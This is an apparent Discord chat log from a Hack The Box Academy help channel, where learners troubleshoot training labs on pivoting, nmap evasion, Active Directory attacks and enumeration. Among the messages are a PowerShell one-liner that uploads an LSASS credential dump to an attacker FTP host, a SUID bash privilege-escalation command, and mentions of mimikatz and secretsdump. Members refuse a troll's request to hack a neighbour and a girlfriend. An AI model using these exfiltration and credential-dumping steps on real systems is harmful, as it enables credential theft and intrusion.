safe star
your attack box opened port 9999
novel lynx
that was the issue, tysm
clear rover
Hey guys, QQ, https://academy.hackthebox.com/module/112/section/1080 the third lab does not reuse credentials from the previous ones right?
novel lynx
ok stuck again, got here: New connection from host 10.129.233.233, source port 37394, added the line "socks4 127.0.0.1 9050" to the /etc/proxychains.conf, and ran the proxychains firefox-esr 172.16.5.135:80
on the attack box, but it is still spinning
@safe star
safe star
can u curl it?
novel lynx
can u curl it?
whoa, i got it, not sure why that worked and the other way didn't
this Pivoting, Tunneling, and Port Forwarding got my head spinning π΅
fathom pendant
Hey guys, QQ, https://academy.hackthebox.com/module/112/section/1080 the third l...
Each lab is independent unless explicitly told otherwise
unique ether
229 Entering Extended Passive Mode (|||15660|)
150 Opening ASCII mode data connection for file list
226 Transfer complete
why am i getting this
fathom pendant
Because you downloaded a file via ftp?
The numbers in front of the lines are status codes
clear rover
Each lab is independent unless explicitly told otherwise
thank you, just finished this one π
fathom pendant
2xx codes are success, 1xx are info, 4xx are errors
3xx are usually "resource not in this location"
5xx are usually server response codes
grand portal
Finally done with Footprinting module. It was so far the best experience in my few years of Cybersecurity.
fathom pendant
grand portal
Frankly, the medium lab was harder than hardlab- for me.
fathom pendant
This is just ks command
Did it display the ls content? Perhaps ls -la to check for anything hidden
unique ether
It did not display but I'll try ls la
fathom pendant
Also helps to say which module and section you're doing
unique ether
Also helps to say which module and section you're doing
Footprinting lab easy
Rn
Ls -la
Worked
fathom pendant
π
fathom pendant
Never forget the basics
remote fulcrum
Stuck with a Q on the Shells&Payloads module. Section PHP Webshells. The last Q asks how the uploaded picture is called. Thing is that I could upload a .php script, by adjusting the content-type. So the webshell I can access is just its name (with .php). The Question answer format is xxxx.gif. So I am confused. Can anyone shed a light on this?
remote fulcrum
its asking for other files in the directory
Oh noooooo. Pfff. I should learn reading.
remote fulcrum
reread the question
Thanks. I feel a bit silly now hahaha.
unique ether
Footprinting lab medium I got an rdp connection and opened mssql management tool after that I changed it to windows authentication
And still I cant access
fathom pendant
Footprinting lab medium I got an rdp connection and opened mssql management tool...
Look for an interesting file
spiral spoke
Hi! When was the last update for Server-Side Attacks Module? it was the last year or a few weeks ago? π€
spiral spoke
https://discord.com/channels/473760315293696010/1232354387288920064/126352188579...
Thanks!
wicked apex
Module: Active Directory Enumeration & Attacks
SectionAD Skill assessment 1
I obtained access to MS01, how do I transfer file from the inital pivot host WEB01 (windows) to MS01?
does net use require smb in ms01 enabled?
wicked apex
I've been using ||xfreerdp's drive option|| and it is constantly disconnecting itself
safe star
Module: Active Directory Enumeration & Attacks
SectionAD Skill assessment 1
I o...
try port forwarding
wait i read that wrong
undone hazel
Hello, has anyone here done the Information Gathering Web edition module new update? I'm stuck in the Subdomain Brute forcing part, I have tried using gobuster with DNS seclists with ns1-2.inlanefreight.com and with blog... but I get no results from it.
wicked apex
wait i read that wrong
You are technically correct since I can portforward the web server port from attack host to the host beyond the pivot host
im using ligolo lemme figure it out
safe star
Hello, has anyone here done the Information Gathering Web edition module new upd...
what does ur command look like?
i got it with 2 diff tools
steady charm
I've been using ||xfreerdp's drive option|| and it is constantly disconnecting i...
Wait why do you transfer files from WEB01 to MS01? Do you want to transfer tools?
If xfreerdp doesn't work I can also suggest giving remmina a try. Never had trouble with mounting my system drives
wicked apex
Wait why do you transfer files from WEB01 to MS01? Do you want to transfer tools...
if xfree ever died one more time imma just use remmina
(and yes I am trying to transfer tools)
steady charm
remmina is nice because you work from a GUI. you can also set up connection profile to easily re-access a session. passing the hash is also very simple
undone hazel
what does ur command look like?
gobuster --enum (blog or ns1 or ns2).inlanefreight.com - f ...seclists/discovery/DND/subdomains-top1million-20000.txt
safe star
thats the syntax for dnsenum
safe star
you dont need to add the subdomains
undone hazel
and I get the error: NS record query failed: NXDOMAIN
safe star
use --dnsserver 1.1.1.1 or a known dns server
undone hazel
use --dnsserver 1.1.1.1 or a known dns server
it gives me the same error
safe star
and it just stops there?
safe star
it gives me the same error
resend the command updated
undone hazel
and it just stops there?
yes, it's weird if I try to manually access inlanefreight.com it seems that the site is down
before the command was working just not giving any results
undone hazel
ah
I did something dumb
i juste didn't pay attention and changed .com to .htb
It worked!
thanks a lot
safe star
i was gonna ask that but u were typing .com in chat
undone hazel
but I don't quite understand why is it necessary to specify a dns server?
safe star
the dnsserver flag isnt needed
it automatically picks one from the resolve.conf im pretty sure
undone hazel
so why didn't it work without the --dnsserver flag?
safe star
well u said that u picked the wrong domain
hexed tartan
any help why access is denied? the service is opened
undone hazel
well u said that u picked the wrong domain
yes I changed it right now but before that I used the good domain without the --dnsserver flag and dnsenum only found the ns1 ns2 and blog domains
wooden summit
hey there, I 'm doing Sqlmap Essentials -> Database Enumeration, is http://.../case8.php the correct for this module? I 'm kinda baffled, would appreciate the help π
safe star
yes I changed it right now but before that I used the good domain without the --...
im not sure tbh maybe its the dns server the tool defaulted to
1.1.1.1 is the fastest resolver so i usually pick that
undone hazel
well in any case thanks a lot this was driving me nuts and I lost a good chunk of time
safe star
hey there, I 'm doing Sqlmap Essentials -> Database Enumeration, is http://.../c...
the question says case#1
wooden summit
the question says case#1
thnx a lot!
faint geode
Hey guys Im stuck on the last question for rpivot in the "Web Server Pivoting with Rpivot" section, I have successfully gotten to the Apache Default page but it says "Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer."
safe star
try curl
faint geode
Like curl -I http://<IP of Apache Default Page>:80 ?
safe star
yes
faint geode
proxychains curl http://<IP of Apache Default Page>:80 ?
Cant see the flag, any idea what the flag should look like ?
hexed tartan
any help why access is denied? the service is opened
some help pls?
safe star
some help pls?
what module
safe star
did you open cmd as admin?
hexed tartan
did you open cmd as admin?
yep i logged in as admin
faint geode
thats what i used cause i couldnt open with firefox
I was able to but its just the default Apache Page, same contents with curl :/
hexed tartan
ok service smbd was disable
safe star
the flag is in there
hexed tartan
i think
safe star
u missed it @faint geode
faint geode
u missed it <@641168583862517791>
So should I be using the -I in the curl command ?
Ive tried with and without
safe star
ok service smbd was disable
there are multiple ways to transfer files
hexed tartan
there are multiple ways to transfer files
yeah nc too but i'm lazy
ionic minnow
Is the server having issue, the target has been spawning for more than 30 minutes
safe star
yeah nc too but i'm lazy
ftp too
oak lance
I'm working on the CrackMapExec module and I just can't get it to run in LDAP mode. I can't find any documentation about SMB shares in LDAP mode. Can anyone shed any light, please?
βββ(kaliγΏkali)-[~/.cme]
ββ$ crackmapexec ldap dc01.inlanefreight.htb -u grace -p Inlanefreight01!
object address : 0xffff95ac4820
object refcount : 4
object type : 0x969dc8
object type name: NameError
object repr : NameError("name 'smb_share_name' is not defined")
lost sys.stderr
and powershell
safe star
Is the server having issue, the target has been spawning for more than 30 minute...
(New-Object System.Net.WebClient).UploadFile('ftp://<ATTCK IP>/lsass.dmp','C:\lsass.dmp')
and just run "python3 -m pyftpdlib -w" on ur machine
faint geode
its near the top
In the CSS code ? Is it meant to satart with HTB{ ?
Its not ver clear at all what the flag is tbh
violet coyote
Is anybody working on module Intro to Windows Evasion? Seems there is a problem with InstallUtil task, it is unsolvable
safe star
In the CSS code ? Is it meant to satart with HTB{ ?
it starts with "I"
safe star
yeah nc too but i'm lazy
i was able to use smbserver
hexed tartan
i was able to use smbserver
Yeah i solved thanks π just restarted smbd
faint geode
it starts with "I"
Theres only two instances of starting with I :/ none of them are it
safe star
look around the title
wicked apex
Does any one got any clue on mapping network folder/drive on remmina like in xfreerdp?
In xfreerdp I can simply provide the path in /drive:<path> it just werk
what about in remmina?
I have been digging around its documentation and guides
faint geode
look around the title
Nothing has worked :/ Im stumpoted, have checked the whole page even saved it to a file and cant find it..
faint geode
i see 2 instances
Can I DM you ?
safe star
ye
runic talon
I am stuck in Attacking Enterprise Networks
Active Directory Compromise module in question After obtaining Domain Admin rights, authenticate to the domain controller and submit the contents of the flag.txt file on the Administrator Desktop. I have managed to get Server Admin privileges and get the admin hash but when i do PTH i get denied or timeout
steady charm
I am stuck in Attacking Enterprise Networks
Active Directory Compromise module ...
did you try PsExec?
you can also just use nxc with the -x flag to type the file
nova ocean
hi guys anybody can help with skills assessment Attacking Common Services - Easy i am stuck on mysql part cant find what to search for
steady charm
Does any one got any clue on mapping network folder/drive on remmina like in xfr...
i do /home/username/folder
there is a big share folder field
i have no idea what the user is and you should remove that due to spoilers. but run psexec as the user that has administrative rights + their hash
runic talon
ok thans
faint geode
Nothing has worked :/ Im stumpoted, have checked the whole page even saved it to...
Got sorted, forgot to ping sweep the network for other IPs, once I found the other one I found the answer. Thanks @safe star
nova ocean
any help? on attacking common services?
wicked apex
how to troubleshoot this
use remmina instead
steady charm
xfreerdp stuck on the blackscreen
press enter
shy charm
Remmina works so well thanks!
steady charm
same problem will pop up in remmina
wicked apex
I don't think ms01 likes the idea of lazagne it freezes everytime I wanna trasfer it
steady charm
just press enter on the black screen
shy charm
just press enter on the black screen
Thanks u
wicked apex
Module: AD
Section Skill Assessment 1
Question 6
I've been stuck w/ user t... as I am trying to look for its cleartext password
its hash cannot be cracked via rockyou and I looked around here to know that its cleartext password is available in memory or something.
Thus I tried mimikatz w/ logonPasswords, as well as lsassdump w/ mimikatz again.
Is there any other stuff I missed/overlooked?
idle sigil
Hi, I need help getting my crackmapexec to work π¦ even though impacket is installed, but it kept saying no module found
wicked apex
maybe install impacket via pip or pipx?
hexed lintel
accidentally closed the previous session, now giving The specified service already exist error
anyidea to fix this withoud resetting the lab
wicked apex
Module: AD
Section Skill Assessment 1
Question 6
I've been stuck w/ user t... as...
Tried NTDS w/ NXC, 0 hahses from ntds dumped
idle sigil
maybe install impacket via pip or pipx?
I've installed impacket with pipx and am still getting the same error when i try to run crackmapexec π¦
safe star
Module: AD
Section Skill Assessment 1
Question 6
I've been stuck w/ user t... as...
possibly
nova ocean
can anybody help??? Attacking Common Services - Skill Assessment Easy
misty current
I've installed impacket with pipx and am still getting the same error when i try...
Use NetExec
idle sigil
Use NetExec
i tried sudo pip3 install impacket and it somehow worked lol - even though i already have impacket installed
steady charm
still better to use nxc, cme is not supported anymore. you are missing out on functionality
safe star
Module: AD
Section Skill Assessment 1
Question 6
I've been stuck w/ user t... as...
have u tried secretsdump?
nova ocean
anybody solved Attacking Common Services ??
safe star
anybody solved Attacking Common Services ??
send screenshot in dm
wicked apex
have u tried secretsdump?
Got tpetty
safe star
u should get a password too
wicked apex
yep. It was in somewhere else I wasn't expected
smoky marten
I think I need a fresh mind
you can have mine if you want
iβm evidently not using it
worn matrix
Can someone tell me why LSASS sometimes have cleartext creds and other times dont?
or if there a blog that explain this or something
cedar zinc
web fuzzing module - API Fuzzing - Question : What is the value returned by the endpoint that the api fuzzer has identified? - I tries multiple wordlists (api_endpoint.txt,common.txt,etc) and found 3-4 directories/api after checking the content of it using "curl" I get the source code, a flag or some other directories... I even tries "-recursion" but I dont know what am i looking for ?? like what value am I looking for - I am sure I have tries every thing That I have found... What is this "value" I am looking for ?? Please help
tardy mango
guys i need serious help someone please?????
y'all please reply someone if you can I'm very nervous rn
grand portal
what's the matter
tardy mango
IS THERE ANY WAY I CAN GET INSTAGRAM ACCOUNT BACK?
worn matrix
did you run a github .exe?
grand portal
take a deep breath
worn matrix
your mother?
tardy mango
I REALLY NEED HELP TO RECOVER THAT DAMN ACCOUNT
worn matrix
if you are undr 18 years old,don try hacking
tardy mango
I'M 19 FGSSS
grand portal
if you are undr 18 years old,don try hacking
wdym being 18 does'nt give freepass to hacking.
tardy mango
CAN SOMEONE HELP ME?
worn matrix
wdym being 18 does'nt give freepass to hacking.
ik
grand portal
your only hope is to remember the password. walk on grass or something, it helped me when i forgot the the password for my iphone-
tardy mango
it's like 7 years old account but it's public account it's embarrassing and I can't be on Instagram
unique ether
Enough discord for today what am I reading
tardy mango
my cousin found she'll tell my mom
marsh echo
hello guys i'm founded the flag for logrotate but in the acces.log file I chmod u+s /bin/bash and I get a shell. does anyone know if I should add anything to get a persistent shell? https://academy.hackthebox.com/module/51/section/1589
cedar void
I am working on the Encrypted array section of the Secure coding 101 javascript module and I examining the following code function:
grand portal
it's like 7 years old account but it's public account it's embarrassing and I ca...
are you sure it's not associated with any number email?
tardy mango
@marsh echo ok hack my account thenπ₯²π₯² then delete everything and have it I don't want it T_T
tardy mango
are you sure it's not associated with any number email?
the phone was stolen email got stolen with phone i don't remember it
grand portal
an account as old of 7 years, i'd think one always did not rely on password. you must have reset it before, which is either by using oldpassword or number or email.
tardy mango
but i can prove that's my account
grand portal
the phone was stolen email got stolen with phone i don't remember it
was the email associated with any number?
tardy mango
an account as old of 7 years, i'd think one always did not rely on password. you...
guys there's one email on account but I don't have it
cedar void
I am working on the Encrypted array section of the Secure coding 101 javascript module(https://academy.hackthebox.com/module/38/section/231) and I examining the following code function:
They claim in the following in this section:
"We see that this function is very ambiguous, as it is filled with references of the _0x54f1 function, and so it doesn't make much sense so far. So, let's take a closer look at the _0x54f1 function, by holding [CTRL] within VSCode, and clicking on any of its references within the sendCode function, which should take us right to it.
Its first two lines are the following:
Code: javascript
k = k - 0;
var value = _0x29f8[k];
As this function starts with referencing another function _0x29f8, let's first understand what _0x29f8 is. We can once again hold [CTRL] and click on it to jump to it."
When I open up that function iin VSCode editor and press 'CTRL' I can't find the Ox29f8 address or the two lines they are claiming are there
grand urchin
Can someone help me with the SQLMAP model
marsh echo
<@402586132967063563> ok hack my account thenπ₯²π₯² then delete everything and hav...
lol this chanel is not appropriate for this, as staff would say read the rules
tardy mango
was the email associated with any number?
i still have that number but it doesn't just work
grand portal
guys there's one email on account but I don't have it
you can have your account back if you just have the number that was linked to your email. usually they are. try numbers that were availabe in your device when you used that email. try forgetting email password
tardy mango
you can have your account back if you just have the number that was linked to yo...
i tried that too idk why it doesn't work
worn matrix
sana sana...
marsh echo
learn academy htb
tardy mango
yea
grand portal
you need to calm down. and move on. @marsh echo is right.
tardy mango
what do i do now is there like no any other way?
cedar void
I am working on the Encrypted array section of the Secure coding 101 javascript ...
For whatever reason discord isn't letting me copy that code into here so I screenshot it. It can be found on the link I gave though
marsh echo
if you have a problem with your account try support π
tardy mango
i did i had on tiktok and Instagram the tiktok is very good it removed my account in week but instagram oh i just hate it
i just want one way I'll be very happy if i get help
acoustic owl
IS THERE ANY WAY I CAN GET INSTAGRAM ACCOUNT BACK?
Reach out to Instagram Support
wicked apex
if you are really into hacking as a career sign up for academy and go thru any modules you like
acoustic owl
so there's no any other way!! T_T
No
worn matrix
so there's no any other way!! T_T
don't ask for these things in public forums,general,dont ask for these kind of things
marsh echo
hello guys i'm founded the flag for logrotate but in the acces.log file I chmod ...
if anyone has a solution to my problem π₯² well it's not really a problem because i found the flag but i don't understand why the flag is not persistent
tardy mango
don't ask for these things in public forums,general,dont ask for these kind of t...
okay so I'll go cry in the corner
tardy mango
but i want it gone it's embarrassing
sinful olive
In Attacking Enterprise Networks I try to connect to the sites I found. In my kali it does not connect at all, but in the VM of HTB it does connect. How can I fix it? I really want to do this on my machine! thanks!
tardy mango
aahh
marsh echo
okay so I'll go cry in the corner
we gave you all the solutions without being mean, really try to contact the support your nothing to lose
wicked apex
In **Attacking Enterprise Networks** I try to connect to the sites I found. In m...
Did you connect to the openvpn in your kali vm?
worn matrix
In **Attacking Enterprise Networks** I try to connect to the sites I found. In m...
vpn
tardy mango
we gave you all the solutions without being mean, really try to contact the supp...
alrr thankyou
wicked apex
sudo openvpn yourvpnfile
sinful olive
vpn
Yes of course... and its connecting.. I can ping the IP address they give. but cannot access the sites. (I also added them to /etc/hosts)
grand portal
think positively, maybe its good instagram is gone.
worn matrix
think positively, maybe its good instagram is gone.
true af
worn matrix
Yes of course... and its connecting.. I can ping the IP address they give. but c...
refresh or change VPN
tardy mango
ya
forest minnow
Hi, I'm getting stuck on the NMAP module, hard lab (Firewall/IDS/IPS Evasion).
||I assumed, after the medium lab, that I still had to find how to get the DNS service version, just now it's harder obviously. After a few nmaps, I can confirm that the UDP 53 port is now closed, and DNS has switched to the TCP 53 port, which is filtered, but I just can't find a way to bypass the firewall. I tried decoy, -sA, -sS, source port 53, to no avail.
I tried to use a proxy in the target network, but enum only returns the target system as up. I also tried the "firewalk" and "firewall-bypass", but it didn't work.||
So now I'm out of options, tbh. If someone has a hint of any sort, maybe it would help.
sinful olive
refresh or change VPN
did that...
grand portal
Yes of course... and its connecting.. I can ping the IP address they give. but c...
make sure pwnbox is not active.
worn matrix
did that...
i dont know...
wicked apex
oh yeah you can only have either one
the pwnbox or the openvpn connection
grand portal
Hi, I'm getting stuck on the NMAP module, hard lab (Firewall/IDS/IPS Evasion).
...
did you really try ||source port 53||?
sinful olive
oh yeah you can only have either one
the pwnbox or the openvpn connection
Tried that too.. really Im lost haha..
forest minnow
did you really try ||source port 53||?
Yes. Worked in medium lab, but not in hard.
worn matrix
put many ip
grand portal
why are you using -g 53?
wary plover
Tried that too.. really Im lost haha..
Try to shut down the pwnbox while connected to your kali via openvpn, it doesn't like concurrent connections iirc
forest minnow
why are you using `-g 53`?
-g is source port, it's equivalent of --source-port
forest minnow
For me, there is no difference
grand portal
For me, there is no difference
use syntax ||--source-port 53 <target ip>||
forest minnow
I just did just in case, but still the same. I don't think the order of the options matters.
grand portal
I just did just in case, but still the same. I don't think the order of the opti...
can you send the nmap command here? i can copy it and try it.
forest minnow
||sudo nmap -n -Pn --disable-arp-ping --source-port 53 10.129.110.83 -p 53 -sV -sA --packet-trace||
wary plover
Nmap doesn't require your arguments to be in a specific order
You can do nmap -vvv 10.229.x.x -sC -oN output -sV and itll run
spark monolith
Hi guys new member here. I currently enroled to crack into htb path and im at service scanning and i have to nmap an ip so i can see what ports are open to answer some questions. The problem is this:
Nmap scan report for 10.129.223.49
Host is up (0.00051s latency).
All 1000 scanned ports on 10.129.223.49 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.23 seconds
grand portal
Nmap doesn't require your arguments to be in a specific order
good to know i did not notice
wicked apex
Hi guys new member here. I currently enroled to crack into htb path and im at se...
check if you are connected to the vpn
ping the target
try the nmap again w/ -Pn
grand portal
||sudo nmap -n -Pn --disable-arp-ping --source-port 53 10.129.110.83 -p 53 -sV -...
you are only targeting port 53, which is indeed filtered. so try without it. why focusing on single port it's probably closed?
forest minnow
In the medium lab, we're supposed to get the dns service version. The hard lab mentions that now, the service is better protected and that we need to get the version still. So I checked the UDP again, which is clearly close, so I switched to TCP. If it were close, I'd get a RST flag in response, but I don't get any response, so I assumed it was filtered by firewall, which we're supposed to get through
(I also tried port 5353 for good measure, but this one is closed)
grand portal
remember, the task itself, does not specify dns service, so be open to more than Dns.
forest minnow
The only open ports I found are ||SSH and HTTP||, which were too easy to get the version of, it can't be the answer π
grand portal
In the medium lab, we're supposed to get the dns service version. The hard lab m...
you are close but specifally using -p 53 is limiting the scan to only dns port, which is shown filtered not useful, or i'd rather say, meaningless
forest minnow
I supposed there was a way to get through the filter, but I guess it was a wrong idea, I'll check other options.
grand portal
I supposed there was a way to get through the filter, but I guess it was a wrong...
Try that Assumption.
forest minnow
Meh. I triggered the IPS. I have to wait to try again.
grand portal
you can simply reset the target
forest minnow
Well, it's only 3 min
grand portal
well, reset is only 30 seconds
forest minnow
But the counter starts at 45/75, where waiting takes it down to 0
grand portal
alright
good, now delete it, and continue with the task.
Information gathering, Subdomain enumeration; Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com. im stuck at this.
shut vapor
Hi guys new member here. I currently enroled to crack into htb path and im at se...
all 1000 scanned ports ...
Does the reading material suggest any ways to scan more than 1000 ports? Looks like the host is responding to ping requests so it's not a technical issue.
spark monolith
maybe it is that i didnt connect to vpn?
shut vapor
It's registering the host as "up" so I wouldn't think VPN is the issue
spark monolith
I also saw a walkthough and he just run: nmap -sV <ip>
sinful olive
Try to shut down the pwnbox while connected to your kali via openvpn, it doesn't...
Yes, I didn't even turn the pwnbox on.. the thing is when I ping or do any command in the terminal it works and shows connection, but when I try to see the sites in the browser or curl then it gets stuck.. for example: ping 10.129.x.x - works.. curl blog.inlanefreight.local - doesn't.. (and I added them to /etc/hosts
grand portal
> all 1000 scanned ports ...
Does the reading material suggest any ways to scan...
if host is responding with ping, then connection is fine.
spark monolith
maybe it is that i didnt connect to vpn?
It is also the first excersice with a vpn-connection file attached thats why im asking
shut vapor
I also saw a walkthough and he just run: nmap -sV <ip>
-sV doesn't scan more or fewer ips. Check again or skim the reading material.
shut vapor
It is also the first excersice with a vpn-connection file attached thats why im ...
I don't have it up. You can try restarting the VPN. That sometimes fixes technicality issues. I can sanity check for you in an hour of it's still an issue. I'll ping you back at that time.
icy marsh
#modules stuck in win privesc sedebugprivilege and setakeownershipprivilege. Can't get the required privileges . tried Enable-Privilege.ps1 and the othe one also tried Fullpowers.exe. none of them worked
next bronze
<#774040263278592041> stuck in win privesc sedebugprivilege and setakeownershipp...
run as admin
icy marsh
run as admin
wait,
icy marsh
run as admin
do We have to manually enable a specific privilege for us from admin cmd prompt and then try to abuse that from non admin prompt ?
next bronze
no just use the admin prompt
icy marsh
no just use the admin prompt
why do I have to use admin prompt ? any specific reason ?
next bronze
it's just a UAC thing
icy marsh
it's just a UAC thing
oh !
my mistake. I forgot to check the local administrators group.
One thing , I am in local administrators group but can't do some administrative task for eg adding a user or change other user's pass. why sthis ?
daring nebula
hello guyes can you teach me hacking please i want to hack my neighbour because he dont let me play football outside and i also want to hack my girlfriend to see if she is cheating on me . because she keep telling me that i like potatoes but i dont and keep calling me baby but my name is dipratasta please help me iam very good nice personnnn
grand portal
Information gathering, Subdomain enumeration; ` Using the known subdomains for i...
i think i found the answer but not sure the way of putting it correctly.
fathom pendant
hello guyes can you teach me hacking please i want to hack my neighbour because ...
If you were a good nice person you wouldn't hack your neighbor
Also that would be illegal
daring nebula
If you were a good nice person you wouldn't hack your neighbor
no you dont understand my nieghbour is a very bad bad person he is evil
fathom pendant
Still illegal anyway skiddo
daring nebula
wrong chat regardless
please visit <#477042232109826048>
but i couldnt write on general that why im typing here
daring nebula
We don't hack girlfriends here you knobhead
but why are you mean what did i do to you
storm elk
@daring nebula you're not in the right place for this. Please do not ask for illegal things as mentioned by other members.
harsh gorge
<@1280475130564448375> you're not in the right place for this. Please do not ask...
Hey stupid question but how do I verify my account
daring nebula
It's fuckin illegal what you're asking for
but why are you swearing you should be banned for that
fathom pendant
Not against the rules to swear
wicked apex
Hey stupid question but how do I verify my account
at #bot-commands do /verify
daring nebula
Not against the rules to swear
ok but try to be nice damn
harsh gorge
Please read <#477042232109826048> and <#569177628918022185> π it will explain h...
Thanks! Appreciate mighty kind of you
storm elk
Thanks! Appreciate mighty kind of you
You're welcome π
fathom pendant
ok but try to be nice damn
This is me being nice about you asking for illegal things
daring nebula
<@1280475130564448375> you're not in the right place for this. Please do not ask...
im sorry sir but i dont think i made something wrong
storm elk
im sorry sir but i dont think i made something wrong
Yes, you did. You're asking for things that are illegal and against Discord ToS.
daring nebula
Yes, you did. You're asking for things that are illegal and against Discord ToS.
but my girlfriend she is cheating on me that is also illegal
fathom pendant
Cheating isn't illegal
daring nebula
Cheating isn't illegal
so you are also a girl right
fathom pendant
Immoral, sure. Illegal, no
vernal hedge
hello guyes can you teach me hacking please i want to hack my neighbour because ...
This guy is trolling lmao
daring nebula
This guy is trolling lmao
what do you mean
fathom pendant
This guy is trolling lmao
It's why I'm not fully engaging
Just seeing how creative the troll is
harsh gorge
but my girlfriend she is cheating on me that is also illegal
Such actions are against the computer fraud and abuse act
vernal hedge
what do you mean
βshe keep telling me that I like potatoesβ
daring nebula
It's why I'm not fully engaging
i think you are the way you was talking to me feel like you want to give me some punshes
fathom pendant
βshe keep telling me that I like potatoesβ
Likely a language barrier thing, or they're a misguided teen
daring nebula
βshe keep telling me that I like potatoesβ
i can send you a screenshot if you want
vernal hedge
Likely a language barrier thing, or they're a misguided teen
Itβs something
fathom pendant
Either way
storm elk
We don't want that. It's a you-problem @daring nebula , this is about Hack The Box and not about hacking your neighbour/girlfriend
daring nebula
We don't want that. It's a you-problem <@1280475130564448375> , this is about Ha...
ok sorry
can you teach me hacking now for protection . i dont think this guyes like me and i think they are planning to destroy my computer
grand portal
Information gathering, Subdomain enumeration; ` Using the known subdomains for i...
@storm elk could you help with this?
storm elk
<@595971365719506977> could you help with this?
dm me
grand portal
can you teach me hacking now for protection . i dont think this guyes like me an...
Learn using the HTB academy if you wanna learn Ethical hacking.
storm elk
ok fineeee can you tell them not heckk meee
If you're afraid, talk to your parents or legal authorities.
vernal hedge
Nobody is gonna hack you lol
daring nebula
If you're afraid, talk to your parents or legal authorities.
i dont think this gonna help
grand portal
back in old days, trolls like such was immediately kicked off by moderators on amino platform.
daring nebula
Nobody is gonna hack you lol
yes they are im sure
storm elk
Can I open a ticket to discuss something with you
I'm not on the support system on the website. Just a moderator on Discord π
daring nebula
Learn using the HTB academy if you wanna learn Ethical hacking.
is that freeee
fathom pendant
No
compact patrolBOT
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
fathom pendant
There are some free modules on htb academy
vernal hedge
But your gonna need the cubes to get the real spicy stuff
storm elk
lol @ spicy stuff
fathom pendant
But mostly everything you learn in academy can be found somewhere else on the internet for free (at a lower quality)
daring nebula
There are some free modules on htb academy
ok thank you guyes im gonna learn hacking so that i will hack my girlfriend and neiighbour and show them my hacking aura and skillss
harsh gorge
I'm not on the support system on the website. Just a moderator on Discord π
Oh no itβs a discord linking issue
grand portal
is that freeee
nope, you need to invest time and brain. it's not one day or 1 month job, or even one 1year job
storm elk
Oh no itβs a discord linking issue
Oh in that case, dm me π
fathom pendant
ok thank you guyes im gonna learn hacking so that i will hack my girlfriend and ...
Your aura will be behind bars dude
grand portal
ok thank you guyes im gonna learn hacking so that i will hack my girlfriend and ...
God bless you
grand portal
let's not forget, that is how basically we were curios to learn to hack. not necessarily hacking gf though, lol
storm elk
not me
wicked apex
yeah
grand portal
the condition, requires having gf. rip me
fathom pendant
let's not forget, that is how basically we were curios to learn to hack. not nec...
I got curious because it seemed interesting, not to hack gf or neighbors
vernal hedge
You lost me at the requirement of having a gf
Hacking takes time though, and Iβve seen tons of people quit because it can be too much, by the time he could learn how to hack his neighbors would have moved out lol
fathom pendant
Hacking takes time though, and Iβve seen tons of people quit because it can be t...
And his gf would have left him
grand portal
by the time one learns hacking, having girlfriend is a liability, as for time.
vernal hedge
And his gf would have left him <:prayge:867733100925550592>
βStop spending 10 hours a day on hack the box!β
grand portal
βStop spending 10 hours a day on hack the box!β
"who you are talking to for so long? who is THIS MARCIELEE"
harsh gorge
βStop spending 10 hours a day on hack the box!β
NEVER I HAVE TO GET MY CPTS
vernal hedge
βBut honey I need to solve this seasonal box Iβve been working on for 27 hoursβ π
grand portal
"your honor, plantiff spends more time with his pc than his wife"
vernal hedge
"your honor, plantiff spends more time with his pc than his wife"
βDoing HTB? Case dismissed, heβs not guiltyβ
storm elk
cough keep it #module related cough
harsh gorge
Oh I guess I could use some help with an academy module
vernal hedge
Uh so modules
harsh gorge
For one pivoting using proxy chains is kinda confusing
grand portal
i could go on with your honor comments, but lets not make it irrelevant chat.
harsh gorge
How does it work under the hood?
wicked apex
For one pivoting using proxy chains is kinda confusing
go ligolo-ng and never go back
grand portal
*cough* keep it #module related *cough*
dm everyday dm
fathom pendant
How does it work under the hood?
It creates a connection that sends traffic destined for one port, back to your machine
Or to the next hop in the chain
storm elk
dm everyday dm
sorry, thought I responded, just an fyi, I am working as well :p
harsh gorge
It creates a connection that sends traffic destined for one port, back to your m...
Oh so like a port forward?
fathom pendant
Yes
Pivoting is just using a port forward to access another machine internally
Can be a higher/lower/same privilege machine that you pivot to
harsh gorge
Can be a higher/lower/same privilege machine that you pivot to
So then could i theoretically use multiple machines in a network as pivot points?
fathom pendant
Yep
Because by the same token that sends traffic back to you, you can also use that access point to scan/access other points in the network
You're creating your own network tunnel
harsh gorge
I see thank you.
On that note, what would be a good practice machine for CPTS? I kinda am coming back from a long hiatus.
fathom pendant
On that note, what would be a good practice machine for CPTS? I kinda am coming ...
Just do the AEN blind if you've already done the course, no single machine will be helpful as CPTS is a networked environment
Just spin up and get DA
No reading questions or sections
harsh gorge
Letβs get it, I guess.
fathom pendant
Anything you struggle on is what modules you should revisit
cedar zinc
web fuzzing module - API Fuzzing - Question : What is the value returned by the endpoint that the api fuzzer has identified? - I tries multiple wordlists (api_endpoint.txt,common.txt,etc) and found 3-4 directories/api after checking the content of it using "curl" I get the source code, a flag or some other directories... I even tries "-recursion" but I dont know what am i looking for ?? like what value am I looking for - I am sure I have tries every thing That I have found... What is this "value" I am looking for ?? Please help
harsh gorge
Anything you struggle on is what modules you should revisit
So pivoting and ad and reporting
fathom pendant
web fuzzing module - API Fuzzing - Question : What is the value returned by the ...
Once you identify the endpoint and curl it...
The response from curl is what the answer is
fathom pendant
web fuzzing module - API Fuzzing - Question : What is the value returned by the ...
A directory isn't an api btw
harsh gorge
An API, is an application programming interface. You make a request to an API and it runs some code in an application and returns a result
shut vapor
@spark monolith Figure this out; what are the module and section titles?
harsh gorge
By fuzzing an API, you attempt to try to find out hidden or otherwise unknown info to you, the attacker, by trying out random words or phrases
fathom pendant
When you curl it you'll get json output that's
{"flag":"value"}
harsh gorge
This is of course different from directory brute forcing as you are trying to retrieve a directory by using a wordlist
fathom pendant
By fuzzing an API, you attempt to try to find out hidden or otherwise unknown in...
In this case the objective is to find an api endpoint not fuzz for accepted values
harsh gorge
In this case the objective is to find an api endpoint not fuzz for accepted valu...
Oh my mistake
fathom pendant
Which the module provides a tool link for
cedar zinc
A directory isn't an api btw
